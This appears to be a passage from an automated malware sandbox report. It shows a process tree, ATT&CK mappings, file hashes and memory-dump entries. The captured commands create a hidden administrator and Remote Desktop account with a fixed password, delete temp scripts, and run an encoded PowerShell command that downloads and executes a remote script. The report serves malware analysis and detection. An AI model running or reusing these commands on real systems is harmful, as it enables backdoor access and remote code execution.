6⤵
PID:948

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
3⤵
PID:3984

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
3⤵
PID:2284

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:2172

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 000000 /del
2⤵
- Suspicious use of WriteProcessMemory
PID:2816

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
3⤵
PID:4024

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc TNC1opdG /add
1⤵
- Suspicious use of WriteProcessMemory
PID:1420

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc TNC1opdG /add
2⤵
- Suspicious use of WriteProcessMemory
PID:1740

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc TNC1opdG /add
3⤵
PID:1304

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:1952

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
2⤵
- Suspicious use of WriteProcessMemory
PID:3544

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
3⤵
PID:3180

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:1656

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
2⤵
- Suspicious use of WriteProcessMemory
PID:3744

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
3⤵
PID:3868

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:3900

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
2⤵
- Suspicious use of WriteProcessMemory
PID:3012

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
3⤵
PID:1504

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc TNC1opdG
1⤵
- Suspicious use of WriteProcessMemory
PID:3000

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc TNC1opdG
2⤵
- Suspicious use of WriteProcessMemory
PID:3808

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc TNC1opdG
3⤵
PID:508

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:1512

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
2⤵
- Modifies data under HKEY_USERS
PID:2780

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:3792

C:\Windows\System32\Wbem\WMIC.exe
wmic CPU get NAME
2⤵
- Modifies data under HKEY_USERS
PID:3812

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:1208

C:\Windows\system32\cmd.exe
cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
2⤵
PID:3428

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:3192

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\77DB.exe
MD5
63151e4f7c3972f18a23c0e9996e14ef

SHA1
5d041fde6433a8ff8fc78a69fca1fd4630e3f270

SHA256
cc28e327610e9deb6551c99a32a44fec86220f2840276474ded747580af850d3

SHA512
f08c402f0a966cbe89fae0b5f9aa8536d6313dada788486a4db422a042769713a2896753acd47223348349b9960b5cde9470cc862668e2cdb90a6fcc1b87c8ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\77DB.exe
MD5
63151e4f7c3972f18a23c0e9996e14ef

SHA1
5d041fde6433a8ff8fc78a69fca1fd4630e3f270

SHA256
cc28e327610e9deb6551c99a32a44fec86220f2840276474ded747580af850d3

SHA512
f08c402f0a966cbe89fae0b5f9aa8536d6313dada788486a4db422a042769713a2896753acd47223348349b9960b5cde9470cc862668e2cdb90a6fcc1b87c8ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES8DF4.tmp
MD5
13ac54264370cb57c7acd4650b2c3cb7

SHA1
95c8f746c1c6ee355efda8300d98e911ea560f02

SHA256
e6e46df8317369c5c9043667e44a9f2935eebd0e29ec402a1d5ffbb2d335b761

SHA512
ee1d2486ca81ed1f50b032a018ef0da34e9216a881b6348d524e8540d361117097975c81cf28fc8a98a178429ff1befb8db64930928d80dfe0403a59cd68fbe7

Download Submit
C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1
MD5
f783019c5dc4a5477d1ffd4f9f512979

SHA1
37c8d1e5dd2ebce647c4e0a92f8598ebf2fdcc7b

SHA256
4c81fee866a87b2de6e10640fe094f0db29258014177e294ac94a819940f5348

SHA512
64d90352f4466f0097dd2c7ace8ccb155947dda8ae148c8c6ba1507a9e879247fab2eba452c812ba628a65de93cc096dabfcb23d2be4b525a92e5ef9e4b57d6a

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1
MD5
28d9755addec05c0b24cca50dfe3a92b

SHA1
7d3156f11c7a7fb60d29809caf93101de2681aa3

SHA256
abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9

SHA512
891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42

Download Submit
C:\Users\Admin\AppData\Local\Temp\sxx5tqxr\sxx5tqxr.dll
MD5
6aa9a969be09d1c14af1e43fccd7b140

SHA1
a2dbda03573463f7d121c5e029e55ec549d2de6e

SHA256
50c6f81c852855da9c75400c50bfb130beae7e894f2e9493f852e62a83f5373d

SHA512
599e9153523603a6ddf83c4444d14c915fe6ecf92bbdadf59455c1faefaedb805882ae2790e411ba4b2f5b8139c460cd3a068a23f3d62c5af15cd24fb1c6e0d2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\sxx5tqxr\CSC29CC70492A45441EAE8F5CDB5DA5D327.TMP
MD5
177bb42e83d266676071c801655f7634

SHA1
3c864e403526990e060c537343abbdfc8446a795

SHA256
2e04902d46abbfe26c1706458c72d629e74ef62422f9a0c8b42987a80e96399e

SHA512
5835834417f05bd50623697fed83b6e39a5b59c5981e5c8e1106e518c387b04ab136b8f9e7933a7a7c28b24f4833b195767170149250cbf5a8c114a3b6f2225a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\sxx5tqxr\sxx5tqxr.0.cs
MD5
9f8ab7eb0ab21443a2fe06dab341510e

SHA1
2b88b3116a79e48bab7114e18c9b9674e8a52165

SHA256
e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9

SHA512
53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\sxx5tqxr\sxx5tqxr.cmdline
MD5
e247e0ddb829103d544a5dabcb4d45c4

SHA1
2e2cb6ab320048c9f47b750aa60e40854e3bd1ed

SHA256
26b3a7e2221a2ff618f1585e8566da75b35bf6589669ae3dd4f03e0c6a76d3e2

SHA512
82b11f3b7a3f81d3f32fc1d98fe4602f86cd21c1117a1dead58eb8365c7e7669a871531c36f2b8856d89dda20870e422a1e5a679c07eefa43bba94e903c53b6d

Download Submit
\Windows\Branding\mediasrv.png
MD5
ac13d804585a74dc542db4ec94da39df

SHA1
8642ae2e04e492700caf41b43de9ef9d8b3c26f9

SHA256
84c41dc018689fcb2fc4240f1e0267a5ee82232e3bcd541f5f5bed4139cfcd55

SHA512
0ba869487fda38d398903df4235bd8f2d0f8fb774b559125ba278751a5a503adbb0557f9ea2fde5fecba4f1a33b71583be36fac0f6f8842cbee0bdd7ea2fb5bf

Download Submit
\Windows\Branding\mediasvc.png
MD5
9151c95451abb048a44f98d0afac8264

SHA1
22f447b210eb25c11be5a9c31f254f5f2bd50a78

SHA256
8082bfe8a9f63854d6317cf6ddc0c18c54140ee5d179a96bfe9900c90d994518

SHA512
728b140e68dcb6751cccb4d1046ac61f63e8db13d4f613b44e161d457f107acc11b3275167c7b4dff34a6d5966116ecb062f94713d0cf4f35b327d14ec7cbd13

Download Submit
memory/372-261-0x0000000000000000-mapping.dmp

Download
memory/372-281-0x0000021F21AE3000-0x0000021F21AE5000-memory.dmp

Filesize
8KB

Download
memory/372-279-0x0000021F21AE0000-0x0000021F21AE2000-memory.dmp

Filesize
8KB

Download
memory/372-282-0x0000021F21AE6000-0x0000021F21AE8000-memory.dmp

Filesize
8KB

Download
memory/372-312-0x0000021F21AE8000-0x0000021F21AEA000-memory.dmp

Filesize
8KB

Download
memory/380-372-0x0000000000000000-mapping.dmp

Download
memory/508-387-0x0000000000000000-mapping.dmp

Download
memory/716-369-0x0000000000000000-mapping.dmp

Download
memory/948-373-0x0000000000000000-mapping.dmp

Download
memory/1304-379-0x0000000000000000-mapping.dmp

Download
memory/1504-385-0x0000000000000000-mapping.dmp

Download
memory/1504-324-0x0000000000000000-mapping.dmp

Download
memory/1640-253-0x0000012EC1FE6000-0x0000012EC1FE8000-memory.dmp

Filesize
8KB

Download
memory/1640-214-0x0000000000000000-mapping.dmp

Download
memory/1640-252-0x0000012EC1FE3000-0x0000012EC1FE5000-memory.dmp

Filesize
8KB

Download
memory/1640-250-0x0000012EC1FE0000-0x0000012EC1FE2000-memory.dmp

Filesize
8KB

Download
memory/1676-145-0x0000000000000000-mapping.dmp

Download
memory/1740-378-0x0000000000000000-mapping.dmp

Download
memory/1756-129-0x00000190F1450000-0x00000190F1452000-memory.dmp

Filesize
8KB

Download
memory/1756-162-0x00000190F4820000-0x00000190F4821000-memory.dmp

Filesize
4KB

Download
memory/1756-141-0x00000190F1450000-0x00000190F1452000-memory.dmp

Filesize
8KB

Download
memory/1756-139-0x00000190F1473000-0x00000190F1475000-memory.dmp

Filesize
8KB

Download
memory/1756-152-0x00000190F3330000-0x00000190F3331000-memory.dmp

Filesize
4KB

Download
memory/1756-138-0x00000190F1470000-0x00000190F1472000-memory.dmp

Filesize
8KB

Download
memory/1756-154-0x00000190F1476000-0x00000190F1478000-memory.dmp

Filesize
8KB

Download
memory/1756-157-0x00000190F1450000-0x00000190F1452000-memory.dmp

Filesize
8KB

Download
memory/1756-158-0x00000190F1450000-0x00000190F1452000-memory.dmp

Filesize
8KB

Download
memory/1756-160-0x00000190F1478000-0x00000190F1479000-memory.dmp

Filesize
4KB

Download
memory/1756-161-0x00000190F4490000-0x00000190F4491000-memory.dmp

Filesize
4KB

Download
memory/1756-128-0x0000000000000000-mapping.dmp

Download
memory/1756-137-0x00000190F3EF0000-0x00000190F3EF1000-memory.dmp

Filesize
4KB

Download
memory/1756-130-0x00000190F1450000-0x00000190F1452000-memory.dmp

Filesize
8KB

Download
memory/1756-131-0x00000190F1450000-0x00000190F1452000-memory.dmp

Filesize
8KB

Download
memory/1756-136-0x00000190F1450000-0x00000190F1452000-memory.dmp

Filesize
8KB

Download
memory/1756-135-0x00000190F1450000-0x00000190F1452000-memory.dmp

Filesize
8KB

Download
memory/1756-134-0x00000190F2E80000-0x00000190F2E81000-memory.dmp

Filesize
4KB

Download
memory/1756-133-0x00000190F1450000-0x00000190F1452000-memory.dmp

Filesize
8KB

Download
memory/1756-132-0x00000190F1450000-0x00000190F1452000-memory.dmp

Filesize
8KB

Download
memory/1952-148-0x0000000000000000-mapping.dmp

Download
memory/2264-367-0x0000000000000000-mapping.dmp

Download
memory/2284-325-0x0000000000000000-mapping.dmp

Download
memory/2284-461-0x0000000000000000-mapping.dmp

Download
memory/2364-371-0x0000000000000000-mapping.dmp

Download
memory/2556-366-0x0000000000000000-mapping.dmp

Download
memory/2772-119-0x0000000000000000-mapping.dmp

Download
memory/2772-122-0x00000208FB240000-0x00000208FB63F000-memory.dmp

Filesize
4.0MB

Download
memory/2772-124-0x00000208FAE20000-0x00000208FAE22000-memory.dmp

Filesize
8KB

Download
memory/2772-125-0x00000208FAE23000-0x00000208FAE25000-memory.dmp

Filesize
8KB

Download
memory/2772-127-0x00000208FAE26000-0x00000208FAE27000-memory.dmp

Filesize
4KB

Download
memory/2772-126-0x00000208FAE25000-0x00000208FAE26000-memory.dmp

Filesize
4KB

Download
memory/2780-388-0x0000000000000000-mapping.dmp

Download
memory/2816-376-0x0000000000000000-mapping.dmp

Download
memory/2852-171-0x00000235B5F60000-0x00000235B5F62000-memory.dmp

Filesize
8KB

Download
memory/2852-206-0x00000235B5F60000-0x00000235B5F62000-memory.dmp

Filesize
8KB

Download
memory/2852-176-0x00000235B5F60000-0x00000235B5F62000-memory.dmp

Filesize
8KB

Download
memory/2852-174-0x00000235B5F60000-0x00000235B5F62000-memory.dmp

Filesize
8KB

Download
memory/2852-173-0x00000235B5F60000-0x00000235B5F62000-memory.dmp

Filesize
8KB

Download
memory/2852-186-0x00000235B5F60000-0x00000235B5F62000-memory.dmp

Filesize
8KB

Download
memory/2852-172-0x00000235B5F60000-0x00000235B5F62000-memory.dmp

Filesize
8KB

Download
memory/2852-170-0x00000235B5F60000-0x00000235B5F62000-memory.dmp

Filesize
8KB

Download
memory/2852-177-0x00000235B5F60000-0x00000235B5F62000-memory.dmp

Filesize
8KB

Download
memory/2852-207-0x00000235B77D6000-0x00000235B77D8000-memory.dmp

Filesize
8KB

Download
memory/2852-180-0x00000235B77D3000-0x00000235B77D5000-memory.dmp

Filesize
8KB

Download
memory/2852-179-0x00000235B77D0000-0x00000235B77D2000-memory.dmp

Filesize
8KB

Download
memory/2852-183-0x00000235B5F60000-0x00000235B5F62000-memory.dmp

Filesize
8KB

Download
memory/2852-169-0x0000000000000000-mapping.dmp

Download
memory/2852-182-0x00000235B5F60000-0x00000235B5F62000-memory.dmp

Filesize
8KB

Download
memory/2852-185-0x00000235B5F60000-0x00000235B5F62000-memory.dmp

Filesize
8KB

Download
memory/2852-181-0x00000235B5F60000-0x00000235B5F62000-memory.dmp

Filesize
8KB

Download
memory/2852-248-0x00000235B77D8000-0x00000235B77DA000-memory.dmp

Filesize
8KB

Download
memory/2988-363-0x0000000000000000-mapping.dmp

Download
memory/2996-362-0x0000000000000000-mapping.dmp

Download
memory/3012-384-0x0000000000000000-mapping.dmp

Download
memory/3012-323-0x0000000000000000-mapping.dmp

Download
memory/3036-118-0x0000000000DE0000-0x0000000000DF6000-memory.dmp

Filesize
88KB

Download
memory/3180-381-0x0000000000000000-mapping.dmp

Download
memory/3192-391-0x0000000000000000-mapping.dmp

Download
memory/3192-403-0x00000207320D0000-0x00000207320D2000-memory.dmp

Filesize
8KB

Download
memory/3192-407-0x00000207320D6000-0x00000207320D8000-memory.dmp

Filesize
8KB

Download
memory/3192-404-0x00000207320D3000-0x00000207320D5000-memory.dmp

Filesize
8KB

Download
memory/3192-433-0x00000207320D8000-0x00000207320D9000-memory.dmp

Filesize
4KB

Download
memory/3428-390-0x0000000000000000-mapping.dmp

Download
memory/3544-380-0x0000000000000000-mapping.dmp

Download
memory/3648-115-0x0000000000030000-0x0000000000038000-memory.dmp

Filesize
32KB

Download
memory/3648-117-0x0000000000400000-0x0000000002EF4000-memory.dmp

Filesize
43.0MB

Download
memory/3648-116-0x00000000001C0000-0x00000000001C9000-memory.dmp

Filesize
36KB

Download
memory/3744-382-0x0000000000000000-mapping.dmp

Download
memory/3808-386-0x0000000000000000-mapping.dmp

Download
memory/3812-389-0x0000000000000000-mapping.dmp

Download
memory/3868-383-0x0000000000000000-mapping.dmp

Download
memory/3984-460-0x0000000000000000-mapping.dmp

Download
memory/4024-377-0x0000000000000000-mapping.dmp

Download
memory/4040-370-0x0000000000000000-mapping.dmp

Download
memory/4076-368-0x0000000000000000-mapping.dmp

Download